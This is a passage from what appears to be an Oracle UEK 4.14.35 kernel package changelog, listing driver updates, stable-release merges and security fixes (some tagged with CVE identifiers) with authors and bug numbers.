[Orabug: 32210458] \n- intel_idle: Customize IceLake server support (Chen Yu) [Orabug: 32219015] \n- qla2xxx: Add missing module version banner (John Donnelly) [Orabug: 32244934] \n- scsi: mpt3sas: Update driver version to 36.100.00.00 (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Handle trigger page after firmware update (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Add persistent MPI trigger page (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Add persistent SCSI sense trigger page (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Add persistent Event trigger page (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Add persistent Master trigger page (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Add persistent trigger pages support (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Sync time periodically between driver and firmware (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Bump driver version to 35.101.00.00 (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Add module parameter multipath_on_hba (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Handle vSES vphy object during HBA reset (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Add bypass_dirty_port_flag parameter (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Handling HBA vSES device (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Set valid PhysicalPort in SMPPassThrough (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Update hba_port objects after host reset (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Get sas_device objects using devices rphy (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Rename transport_del_phy_from_an_existing_port() (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Get device objects using sas_address & portID (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Update hba_ports sas_address & phy_mask (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Rearrange _scsih_mark_responding_sas_device() (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Allocate memory for hba_port objects (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Define hba_port structure (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Fix ioctl timeout (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: A small correction in _base_process_reply_queue (Tomas Henzl) [Orabug: 32223781] \n- scsi: mpt3sas: Fix sync irqs (Tomas Henzl) [Orabug: 32223781] \n- scsi: mpt3sas: Detect tampered Aero and Sea adapters (Sreekanth Reddy) [Orabug: 32223781] \n- scsi: mpt3sas: Dont call disable_irq from IRQ poll handler (Tomas Henzl) [Orabug: 32223781] \n- scsi: mpt3sas: Remove pci-dma-compat wrapper API (Suraj Upadhyay) [Orabug: 32223781] \n- scsi: mpt3sas: Remove superfluous memset() (Li Heng) [Orabug: 32223781] \n- scsi: mpt3sas: Update driver version to 35.100.00.00 (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Postprocessing of target and LUN reset (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Add functions to check if any cmd is outstanding on Target and LUN (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Rename and export interrupt mask/unmask functions (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Cancel the running work during host reset (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Dump system registers for debugging (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Memset config_cmds.reply buffer with zeros (Suganath Prabu S) [Orabug: 32223781] \n- scsi: mpt3sas: Fix kdoc comments format (Damien Le Moal) [Orabug: 32223781] \n- scsi: mpt3sas: Fix set but unused variable (Damien Le Moal) [Orabug: 32223781] \n- scsi: mpt3sas: Fix error returns in BRM_status_show (Johannes Thumshirn) [Orabug: 32223781] \n- scsi: mpt3sas: Fix unlock imbalance (Damien Le Moal) [Orabug: 32223781] \n- scsi: mpt3sas: Fix spelling mistake (Flavio Suligoi) [Orabug: 32223781]\n[4.14.35-2047.500.3]\n- hv_netvsc: make recording RSS hash depend on feature flag (Stephen Hemminger) [Orabug: 32173883] \n- hv_netvsc: record hardware hash in skb (Stephen Hemminger) [Orabug: 32173883] \n- ocfs2: initialize ip_next_orphan (Wengang Wang) [Orabug: 32177802] \n- scsi: qla2xxx: Update version to 10.02.00.103-k (Nilesh Javali) [Orabug: 32213922] \n- qla2xxx: back port upstream patch (Quinn Tran) [Orabug: 32213922] \n- scsi: scsi_transport_fc: Add FPIN fc event codes (James Smart) [Orabug: 32213922] \n- scsi: scsi_transport_fc: refactor event posting routines (James Smart) [Orabug: 32213922] \n- Revert 'scsi: qla2xxx: Disable T10-DIF feature with FC-NVMe during probe' (Quinn Tran) [Orabug: 32213922] \n- Revert 'scsi: qla2xxx: Fix crash on qla2x00_mailbox_command' (Saurav Kashyap) [Orabug: 32213922] \n- scsi: qla2xxx: Check if FW supports MQ before enabling (Saurav Kashyap) [Orabug: 32213922] \n- scsi: qla2xxx: Allow ql2xextended_error_logging special value 1 to be set anytime (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Reduce noisy debug message (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Reduce duplicate code in reporting speed (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Indicate correct supported speeds for Mezz card (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Flush I/O on zone disable (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Flush all sessions on zone disable (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: remove incorrect sparse #ifdef (Linus Torvalds) [Orabug: 32213922] \n- scsi: qla2xxx: Return EBUSY on fcport deletion (Daniel Wagner) [Orabug: 32213922] \n- scsi: qla2xxx: Fix return of uninitialized value in rval (Colin Ian King) [Orabug: 32213922] \n- scsi: qla2xxx: Initialize variable in qla8044_poll_reg() (Tom Rix) [Orabug: 32213922] \n- scsi: qla2xxx: Do not consume srb greedily (Daniel Wagner) [Orabug: 32213922] \n- scsi: qla2xxx: Use constant when it is known (Pavel Machek (CIP)) [Orabug: 32213922] \n- scsi: qla2xxx: Fix null pointer access during disconnect from subsystem (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Fix inconsistent format argument type in qla_dbg.c (Ye Bin) [Orabug: 32213922] \n- scsi: qla2xxx: Fix inconsistent format argument type in qla_os.c (Ye Bin) [Orabug: 32213922] \n- scsi: qla2xxx: Fix inconsistent format argument type in tcm_qla2xxx.c (Ye Bin) [Orabug: 32213922] \n- scsi: qla2xxx: Fix point-to-point (N2N) device discovery issue (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Fix crash on session cleanup with unload (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Fix reset of MPI firmware (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Fix MPI reset needed message (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Fix buffer-buffer credit extraction error (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Fix WARN_ON in qla_nvme_register_hba (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Correct the check for sscanf() return value (Saurav Kashyap) [Orabug: 32213922] \n- scsi: qla2xxx: Update version to 10.02.00.102-k (Nilesh Javali) [Orabug: 32213922] \n- scsi: qla2xxx: Add SLER and PI control support (Saurav Kashyap) [Orabug: 32213922] \n- scsi: qla2xxx: Add IOCB resource tracking (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Add rport fields in debugfs (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Make tgt_port_database available in initiator mode (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Fix I/O errors during LIP reset tests (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Performance tweak (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Fix memory size truncation (Quinn Tran) [Orabug: 32213922] \n- scsi: qla2xxx: Honor status qualifier in FCP_RSP per spec (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Allow dev_loss_tmo setting for FC-NVMe devices (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Setup debugfs entries for remote ports (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Fix I/O failures during remote port toggle testing (Arun Easi) [Orabug: 32213922] \n- scsi: qla2xxx: Remove unneeded variable 'rval' (Jason Yan) [Orabug: 32213922] \n- scsi: qla2xxx: Handle incorrect entry_type entries (Daniel Wagner) [Orabug: 32213922] \n- scsi: qla2xxx: Log calling function name in qla2x00_get_sp_from_handle() (Daniel Wagner) [Orabug: 32213922] \n- scsi: qla2xxx: Simplify return value logic in qla2x00_get_sp_from_handle() (Daniel Wagner) [Orabug: 32213922] \n- scsi: qla2xxx: Warn if done() or free() are called on an already freed srb (Daniel Wagner) [Orabug: 32213922] \n- scsi: qla2xxx: Fix the return value (Xianting Tian) [Orabug: 32213922] \n- scsi: qla2xxx: Fix wrong return value in qla_nvme_register_hba() (Tianjia Zhang) [Orabug: 32213922] \n- scsi: qla2xxx: Fix wrong return value in qlt_chk_unresolv_exchg() (Tianjia Zhang) [Orabug: 32213922] \n- scsi: qla2xxx: Remove redundant variable initialization (Tianjia Zhang) [Orabug: 32213922] \n- scsi: qla2xxx: Fix the size used in a 'dma_free_coherent()' call (Christophe JAILLET) [Orabug: 32213922] \n- scsi: qla2xxx: Remove pci-dma-compat wrapper API (Suraj Upadhyay) [Orabug: 32213922] \n- scsi: qla2xxx: Remove superfluous memset() (Li Heng) [Orabug: 32213922] \n- scsi: qla2xxx: Fix regression on sparc64 (Rene Rebe) [Orabug: 32213922] \n- scsi: qla2xxx: Use MBX_TOV_SECONDS for mailbox command timeout values (Enzo Matsumiya) [Orabug: 32213922] \n- scsi: qla2xxx: Address a set of sparse warnings (Shyam Sundar) [Orabug: 32213922] \n- scsi: qla2xxx: SAN congestion management implementation (Shyam Sundar) [Orabug: 32213922] \n- scsi: qla2xxx: Change in PUREX to handle FPIN ELS requests (Shyam Sundar) [Orabug: 32213922] \n- scsi: qla2xxx: Introduce a function for computing the debug message prefix (Bart Van Assche) [Orabug: 32213922] \n- scsi: qla2xxx: Make qla2x00_restart_isp() easier to read (Bart Van Assche) [Orabug: 32213922] \n- scsi: qla2xxx: Fix a Coverity complaint in qla2100_fw_dump() (Bart Van Assche) [Orabug: 32213922] \n- scsi: qla2xxx: Make __qla2x00_alloc_iocbs() initialize 32 bits of request_t.handle (Bart Van Assche) [Orabug: 32213922] \n- scsi: qla2xxx: Remove a superfluous cast (Bart Van Assche) [Orabug: 32213922] \n- scsi: qla2xxx: Initialize 'n' before using it (Bart Van Assche) [Orabug: 32213922] \n- scsi: qla2xxx: Make qla82xx_flash_wait_write_finish() easier to read (Bart Van Assche) [Orabug: 32213922] \n- scsi: qla2xxx: Remove the __packed annotation from struct fcp_hdr and fcp_hdr_le (Bart Van Assche) [Orabug: 32213922] \n- scsi: qla2xxx: Check the size of struct fcp_hdr at compile time (Bart Van Assche) [Orabug: 32213922] \n- scsi: fc: Update Descriptor definition and add RDF and Link Integrity FPINs (James Smart) [Orabug: 32213922] \n- scsi: fc: add FPIN ELS definition (James Smart) [Orabug: 32213922] \n- staging: rts5208: rename SG_END macro (Arnd Bergmann) [Orabug: 32218536] \n- misc: rtsx: rename SG_END macro (Arnd Bergmann) [Orabug: 32218536] \n- ACPI: NFIT: Add runtime firmware activate support (Dan Williams) [Orabug: 32224144] \n- PM, libnvdimm: Add runtime firmware activation support (Dan Williams) [Orabug: 32224144] \n- libnvdimm: Convert to DEVICE_ATTR_ADMIN_RO() (Dan Williams) [Orabug: 32224144] \n- driver-core: Introduce DEVICE_ATTR_ADMIN_{RO,RW} (Dan Williams) [Orabug: 32224144] \n- tools/testing/nvdimm: Emulate firmware activation commands (Dan Williams) [Orabug: 32224144] \n- tools/testing/nvdimm: Prepare nfit_ctl_test() for ND_CMD_CALL emulation (Dan Williams) [Orabug: 32224144] \n- tools/testing/nvdimm: Add command debug messages (Dan Williams) [Orabug: 32224144] \n- tools/testing/nvdimm: Cleanup dimm index passing (Dan Williams) [Orabug: 32224144] \n- ACPI: NFIT: Define runtime firmware activation commands (Dan Williams) [Orabug: 32224144] \n- ACPI: NFIT: Move bus_dsm_mask out of generic nvdimm_bus_descriptor (Dan Williams) [Orabug: 32224144] \n- libnvdimm: Validate command family indices (Dan Williams) [Orabug: 32224144] \n- PM: hibernate: Incorporate concurrency handling (Domenico Andreoli) [Orabug: 32224144] \n- libnvdimm: Move nvdimm_bus_attribute_group to device_type (Dan Williams) [Orabug: 32224144] \n- libnvdimm/of_pmem: Provide a unique name for bus provider (Aneesh Kumar K.V) [Orabug: 32224144] \n- libnvdimm: Move nvdimm_attribute_group to device_type (Dan Williams) [Orabug: 32224144] \n- libnvdimm: Move nd_mapping_attribute_group to device_type (Dan Williams) [Orabug: 32224144] \n- libnvdimm: Move nd_region_attribute_group to device_type (Dan Williams) [Orabug: 32224144] \n- libnvdimm: Move nd_numa_attribute_group to device_type (Dan Williams) [Orabug: 32224144] \n- libnvdimm: Move nd_device_attribute_group to device_type (Dan Williams) [Orabug: 32224144] \n- libnvdimm: Move region attribute group definition (Dan Williams) [Orabug: 32224144] \n- libnvdimm/region: Rewrite _probe_success() to _advance_seeds() (Dan Williams) [Orabug: 32224144] \n- libnvdimm: Move attribute groups to device type (Dan Williams) [Orabug: 32224144] \n- acpi/nfit: improve bounds checking for 'func' (Dan Carpenter) [Orabug: 32224144] \n- ACPI/nfit: delete the function to_acpi_nfit_desc (Xiaochun Lee) [Orabug: 32224144]\n[4.14.35-2047.500.2]\n- lockdown: make lockdown mode available in securityfs (Alan Maguire) [Orabug: 32176137] \n- uek-rpm: Dont build emb2 kernel for mips (Dave Kleikamp) [Orabug: 32176895] \n- xen/events: block rogue events for some time (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/events: defer eoi in case of excessive number of events (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/events: use a common cpu hotplug hook for event channels (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/events: switch user event channels to lateeoi model (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/pciback: use lateeoi irq binding (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/pvcallsback: use lateeoi irq binding (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/scsiback: use lateeoi irq binding (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/netback: use lateeoi irq binding (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/blkback: use lateeoi irq binding (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/events: add a new 'late EOI' evtchn framework (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/events: fix race in evtchn_fifo_unmask() (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- xen/events: add a proper barrier to 2-level uevent unmasking (Juergen Gross) [Orabug: 32177537] {CVE-2020-27673}\n- page_frag: Recover from memory pressure (Dongli Zhang) [Orabug: 32177989] \n- RDMA/umem: Move to allocate SG table from pages (Maor Gottlieb) [Orabug: 32195765] \n- lib/scatterlist: Add support in dynamic allocation of SG table from pages (Maor Gottlieb) [Orabug: 32195765] \n- lib/scatterlist: Add SG_CHAIN and SG_END macros for LSB encodings (Anshuman Khandual) [Orabug: 32195765] \n- lib/scatterlist: Avoid potential scatterlist entry overflow (Tvrtko Ursulin) [Orabug: 32195765] \n- lib/scatterlist: Fix offset type in sg_alloc_table_from_pages (Tvrtko Ursulin) [Orabug: 32195765] \n- rds: fix out-of-tree build broken by tracepoints (Alan Maguire) [Orabug: 32185345] \n- xen/events: avoid removing an event channel while handling it (Juergen Gross) [Orabug: 32177547]\n[4.14.35-2047.500.1]\n- perf/core: Fix a memory leak in perf_event_parse_addr_filter() (kiyin( )) [Orabug: 32131174] {CVE-2020-25704}\n- perf/core: Fix bad use of igrab() (Song Liu) [Orabug: 32131174] {CVE-2020-25704}\n- IB/mlx4: Add support for REJ due to timeout (Hakon Bugge) [Orabug: 32136897] \n- IB/mlx4: Separate tunnel and wire bufs parameters (Hakon Bugge) [Orabug: 32136897] \n- IB/mlx4: Add support for MRA (Hakon Bugge) [Orabug: 32136897] \n- IB/mlx4: Add and improve logging (Hakon Bugge) [Orabug: 32136897] \n- xen/gntdev: fix up blockable calls to mn_invl_range_start (Michal Hocko) [Orabug: 32139243] \n- uek-rpm: Enable Intel Speed Select Technology interface support (Somasundaram Krishnasamy) [Orabug: 32047440] \n- platform/x86: ISST: Add new PCI device ids (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Increase timeout (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Fix wrong unregister type (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Allow additional core-power mailbox commands (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Allow additional TRL MSRs (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Use dev_get_drvdata (Chuhong Yuan) [Orabug: 32047440] \n- platform/x86: ISST: Restore state on resume (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Add Intel Speed Select PUNIT MSR interface (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Add Intel Speed Select mailbox interface via MSRs (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Add Intel Speed Select mailbox interface via PCI (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Add Intel Speed Select mmio interface (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Add IOCTL to Translate Linux logical CPU to PUNIT CPU number (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Store per CPU information (Srinivas Pandruvada) [Orabug: 32047440] \n- platform/x86: ISST: Add common API to register and handle ioctls (Srinivas Pandruvada) [Orabug: 32047440]\n[4.14.35-2046]\n- lockdown: By default run in integrity mode. (Konrad Rzeszutek Wilk) [Orabug: 32131560] \n- kernel: add panic_on_taint (Rafael Aquini) [Orabug: 32138009] \n- Revert 'pci: hardcode enumeration' (Dave Aldridge) [Orabug: 32152281] \n- hv_utils: drain the timesync packets on onchannelcallback (Vineeth Pillai) [Orabug: 32152143] \n- hv_utils: return error if host timesysnc update is stale (Vineeth Pillai) [Orabug: 32152143] \n- Revert 'iomap: Fix pipe page leakage during splicing' (George Kennedy) [Orabug: 30848187] \n- x86/cpu/intel: enable X86_FEATURE_NT_GOOD on Intel Icelakx (Ankur Arora) [Orabug: 32080078] \n- x86/cpu/amd: enable X86_FEATURE_NT_GOOD on AMD Zen (Ankur Arora) [Orabug: 32080078] \n- x86/cpu/intel: enable X86_FEATURE_NT_GOOD on Intel Broadwellx (Ankur Arora) [Orabug: 32080078] \n- mm, clear_huge_page: use clear_page_uncached() for gigantic pages (Ankur Arora) [Orabug: 32080078] \n- x86/clear_page: add clear_page_uncached() (Ankur Arora) [Orabug: 32080078] \n- x86/asm: add clear_page_nt() (Ankur Arora) [Orabug: 32080078] \n- perf bench: add memset_movnti() (Ankur Arora) [Orabug: 32080078] \n- x86/asm: add memset_movnti() (Ankur Arora) [Orabug: 32080078] \n- x86/cpuid: add X86_FEATURE_NT_GOOD (Ankur Arora) [Orabug: 32080078] \n- Linux 4.14.206 (Greg Kroah-Hartman) \n- powercap: restrict energy meter to root access (Len Brown) \n- Linux 4.14.205 (Greg Kroah-Hartman) [Orabug: 32041544] \n- arm64: dts: marvell: espressobin: add ethernet alias (Tomasz Maciej Nowak) \n- PM: runtime: Resume the device earlier in __device_release_driver() (Rafael J. Wysocki) \n- Revert 'ARC: entry: fix potential EFA clobber when TIF_SYSCALL_TRACE' (Vineet Gupta) \n- ARC: stack unwinding: avoid indefinite looping (Vineet Gupta) \n- usb: mtu3: fix panic in mtu3_gadget_stop() (Macpaul Lin) \n- USB: Add NO_LPM quirk for Kingston flash drive (Alan Stern) \n- USB: serial: option: add Telit FN980 composition 0x1055 (Daniele Palmas) \n- USB: serial: option: add LE910Cx compositions 0x1203, 0x1230, 0x1231 (Daniele Palmas) \n- USB: serial: option: add Quectel EC200T module support (Ziyi Cao) \n- USB: serial: cyberjack: fix write-URB completion race (Johan Hovold) \n- serial: txx9: add missing platform_driver_unregister() on error in serial_txx9_init (Qinglang Miao) \n- serial: 8250_mtk: Fix uart_get_baud_rate warning (Claire Chang) \n- fork: fix copy_process(CLONE_PARENT) race with the exiting ->real_parent (Eddy Wu) \n- vt: Disable KD_FONT_OP_COPY (Daniel Vetter) \n- ACPI: NFIT: Fix comparison to '-ENXIO' (Zhang Qilong) \n- drm/vc4: drv: Add error handding for bind (Hoegeun Kwon) \n- vsock: use ns_capable_noaudit() on socket create (Jeff Vander Stoep) \n- scsi: core: Dont start concurrent async scan on same host (Ming Lei) \n- blk-cgroup: Pre-allocate tree node on blkg_conf_prep (Gabriel Krisman Bertazi) \n- blk-cgroup: Fix memleak on error path (Gabriel Krisman Bertazi) \n- of: Fix reserved-memory overlap detection (Vincent Whitchurch) \n- x86/kexec: Use up-to-dated screen_info copy to fill boot params (Kairui Song) \n- ARM: dts: sun4i-a10: fix cpu_alert temperature (Clement Peron) \n- futex: Handle transient 'ownerless' rtmutex state correctly (Mike Galbraith) \n- tracing: Fix out of bounds write in get_trace_buf (Qiujun Huang) \n- ftrace: Handle tracing when switching between context (Steven Rostedt (VMware)) \n- ftrace: Fix recursion check for NMI test (Steven Rostedt (VMware)) \n- gfs2: Wake up when sd_glock_disposal becomes zero (Alexander Aring) \n- mm: always have io_remap_pfn_range() set pgprot_decrypted() (Jason Gunthorpe) \n- kthread_worker: prevent queuing delayed work from timer_fn when it is being canceled (Zqiang) \n- lib/crc32test: remove extra local_irq_disable/enable (Vasily Gorbik) \n- ALSA: usb-audio: Add implicit feedback quirk for Qu-16 (Geoffrey D. Bennett) \n- Fonts: Replace discarded const qualifier (Lee Jones) \n- blktrace: fix debugfs use after free (Luis Chamberlain) {CVE-2019-19770}\n- Blktrace: bail out early if block debugfs is not configured (Liu Bo) \n- sfp: Fix error handing in sfp_probe() (YueHaibing) \n- sctp: Fix COMM_LOST/CANT_STR_ASSOC err reporting on big-endian platforms (Petr Malat) \n- net: usb: qmi_wwan: add Telit LE910Cx 0x1230 composition (Daniele Palmas) \n- gianfar: Account for Tx PTP timestamp in the skb headroom (Claudiu Manoil) \n- gianfar: Replace skb_realloc_headroom with skb_cow_head for PTP (Claudiu Manoil) \n- tipc: fix use-after-free in tipc_bcast_get_mode (Hoang Huu Le) \n- drm/i915: Break up error capture compression loops with cond_resched() (Chris Wilson) \n- Linux 4.14.204 (Greg Kroah-Hartman) \n- staging: comedi: cb_pcidas: Allow 2-channel commands for AO subdevice (Ian Abbott) \n- KVM: arm64: Fix AArch32 handling of DBGD{CCINT,SCRext} and DBGVCR (Marc Zyngier) \n- device property: Dont clear secondary pointer for shared primary firmware node (Andy Shevchenko) \n- device property: Keep secondary firmware node secondary by type (Andy Shevchenko) \n- ARM: s3c24xx: fix missing system reset (Krzysztof Kozlowski) \n- ARM: samsung: fix PM debug build with DEBUG_LL but !MMU (Krzysztof Kozlowski) \n- arm: dts: mt7623: add missing pause for switchport (Frank Wunderlich) \n- hil/parisc: Disable HIL driver when it gets stuck (Helge Deller) \n- cachefiles: Handle readpage error correctly (Matthew Wilcox (Oracle)) \n- arm64: berlin: Select DW_APB_TIMER_OF (Jisheng Zhang) \n- tty: make FONTX ioctl use the tty pointer they were actually passed (Linus Torvalds) \n- rtc: rx8010: dont modify the global rtc ops (Bartosz Golaszewski) \n- drm/ttm: fix eviction valuable range check. (Dave Airlie) \n- ext4: fix invalid inode checksum (Luo Meng) \n- ext4: fix error handling code in add_new_gdb (Dinghao Liu) \n- ext4: fix leaking sysfs kobject after failed mount (Eric Biggers) \n- vringh: fix __vringh_iov() when riov and wiov are different (Stefano Garzarella) \n- ring-buffer: Return 0 on success from ring_buffer_resize() (Qiujun Huang) \n- 9P: Cast to loff_t before multiplying (Matthew Wilcox (Oracle)) \n- libceph: clear con->out_msg on Policy::stateful_server faults (Ilya Dryomov) \n- ceph: promote to unsigned long long before shifting (Matthew Wilcox (Oracle)) \n- drm/amdgpu: dont map BO in reserved region (Madhav Chauhan) \n- ia64: fix build error with !COREDUMP (Krzysztof Kozlowski) \n- ubi: check kthread_should_stop() after the setting of task state (Zhihao Cheng) \n- perf python scripting: Fix printable strings in python3 scripts (Jiri Olsa) \n- ubifs: dent: Fix some potential memory leaks while iterating entries (Zhihao Cheng) \n- NFSD: Add missing NFSv2 .pc_func methods (Chuck Lever) \n- NFSv4.2: support EXCHGID4_FLAG_SUPP_FENCE_OPS 4.2 EXCHANGE_ID flag (Olga Kornievskaia) \n- powerpc/powernv/elog: Fix race while processing OPAL error log event. (Mahesh Salgaonkar) \n- powerpc: Warn about use of smt_snooze_delay (Joel Stanley) \n- powerpc/rtas: Restrict RTAS requests from userspace (Andrew Donnellan) \n- s390/stp: add locking to sysfs functions (Sven Schnelle) \n- iio:gyro:itg3200: Fix timestamp alignment and prevent data leak. (Jonathan Cameron) \n- iio:adc:ti-adc12138 Fix alignment issue with timestamp (Jonathan Cameron) \n- iio:adc:ti-adc0832 Fix alignment issue with timestamp (Jonathan Cameron) \n- iio:light:si1145: Fix timestamp alignment and prevent data leak. (Jonathan Cameron) \n- dmaengine: dma-jz4780: Fix race in jz4780_dma_tx_status (Paul Cercueil) \n- vt: keyboard, extend func_buf_lock to readers (Jiri Slaby) {CVE-2020-25656}\n- vt: keyboard, simplify vt_kdgkbsent (Jiri Slaby) \n- drm/i915: Force VTd workarounds when running as a guest OS (Chris Wilson) \n- usb: host: fsl-mph-dr-of: check return of dma_set_mask() (Ran Wang) \n- usb: cdc-acm: fix cooldown mechanism (Jerome Brunet) \n- usb: dwc3: core: dont trigger runtime pm when remove driver (Li Jun) \n- usb: dwc3: core: add phy cleanup for probe error handling (Li Jun) \n- usb: dwc3: ep0: Fix ZLP for OUT ep0 requests (Thinh Nguyen) \n- btrfs: fix use-after-free on readahead extent after failure to create it (Filipe Manana) \n- btrfs: cleanup cow block on error (Josef Bacik) \n- btrfs: use kvzalloc() to allocate clone_roots in btrfs_ioctl_send() (Denis Efremov) \n- btrfs: send, recompute reference path after orphanization of a directory (Filipe Manana) \n- btrfs: reschedule if necessary when logging directory items (Filipe Manana) \n- scsi: mptfusion: Fix null pointer dereferences in mptscsih_remove() (Helge Deller) \n- w1: mxc_w1: Fix timeout resolution problem leading to bus error (Martin Fuzzey) \n- acpi-cpufreq: Honor _PSD table setting on new AMD CPUs (Wei Huang) \n- ACPI: debug: dont allow debugging when ACPI is disabled (Jamie Iles) \n- ACPI: video: use ACPI backlight for HP 635 Notebook (Alex Hung) \n- ACPI / extlog: Check for RDMSR failure (Ben Hutchings) \n- NFS: fix nfs_path in case of a rename retry (Ashish Sangwan) \n- fs: Dont invalidate page buffers in block_write_full_page() (Jan Kara) \n- leds: bcm6328, bcm6358: use devres LED registering function (Marek Behun) \n- perf/x86/amd/ibs: Fix raw sample data accumulation (Kim Phillips) \n- perf/x86/amd/ibs: Dont include randomized bits in get_ibs_op_count() (Kim Phillips) \n- md/raid5: fix oops during stripe resizing (Song Liu) \n- nvme-rdma: fix crash when connect rejected (Chao Leng) \n- sgl_alloc_order: fix memory leak (Douglas Gilbert) \n- nbd: make the config put is called before the notifying the waiter (Xiubo Li) \n- ARM: dts: s5pv210: remove dedicated 'audio-subsystem' node (Krzysztof Kozlowski) \n- ARM: dts: s5pv210: move PMU node out of clock controller (Krzysztof Kozlowski) \n- ARM: dts: s5pv210: remove DMA controller bus node name to fix dtschema warnings (Krzysztof Kozlowski) \n- memory: emif: Remove bogus debugfs error handling (Dan Carpenter) \n- arm64: dts: renesas: ulcb: add full-pwr-cycle-in-suspend into eMMC nodes (Yoshihiro Shimoda) \n- gfs2: add validation checks for size of superblock (Anant Thazhemadam) \n- ext4: Detect already used quota file early (Jan Kara) \n- drivers: watchdog: rdc321x_wdt: Fix race condition bugs (Madhuparna Bhowmik) \n- net: 9p: initialize sun_server.sun_path to have addrs value only when addr is valid (Anant Thazhemadam) \n- clk: ti: clockdomain: fix static checker warning (Tero Kristo) \n- bnxt_en: Log unknown link speed appropriately. (Michael Chan) \n- md/bitmap: md_bitmap_get_counter returns wrong blocks (Zhao Heming) \n- power: supply: test_power: add missing newlines when printing parameters by sysfs (Xiongfeng Wang) \n- bus/fsl_mc: Do not rely on caller to provide non NULL mc_io (Diana Craciun) \n- drivers/net/wan/hdlc_fr: Correctly handle special skb->protocol values (Xie He) \n- ACPI: Add out of bounds and numa_off protections to pxm_to_node() (Jonathan Cameron) \n- arm64/mm: return cpu_all_mask when node is NUMA_NO_NODE (Zhengyuan Liu) \n- uio: free uio id after uio file node is freed (Lang Dai) \n- USB: adutux: fix debugging (Oliver Neukum) \n- cpufreq: sti-cpufreq: add stih418 support (Alain Volmat) \n- kgdb: Make 'kgdbcon' work properly with 'kgdb_earlycon' (Douglas Anderson) \n- printk: reduce LOG_BUF_SHIFT range for H8300 (John Ogness) \n- drm/bridge/synopsys: dsi: add support for non-continuous HS clock (Antonio Borneo) \n- mmc: via-sdmmc: Fix data race bug (Madhuparna Bhowmik) \n- media: tw5864: check status of tw5864_frameinterval_get (Tom Rix) \n- usb: typec: 